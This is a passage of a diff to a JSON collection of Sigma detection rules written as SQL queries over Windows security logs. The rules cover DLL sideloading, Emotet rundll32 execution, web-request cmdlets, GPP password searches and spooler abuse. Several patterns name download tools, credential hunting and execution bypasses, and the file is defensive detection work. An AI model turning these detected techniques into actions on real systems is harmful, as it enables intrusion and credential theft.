'\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "test", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1059.001", - "attack.execution" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "title": "Fsutil Drive Enumeration", + "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Unknown" + "Certain software or administrative tasks may trigger false positives." ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_fsutil_drive_enumeration.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Amsi.DLL Load By Uncommon Process", - "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", - "status": "experimental", - "description": "Detects loading of Amsi.dll by uncommon processes", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ - "Likely" + "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_amsi_uncommon_process.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "WMI Modules Loaded", - "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "status": "test", - "description": "Detects non wmiprvse loading WMI modules", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_module_load.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' 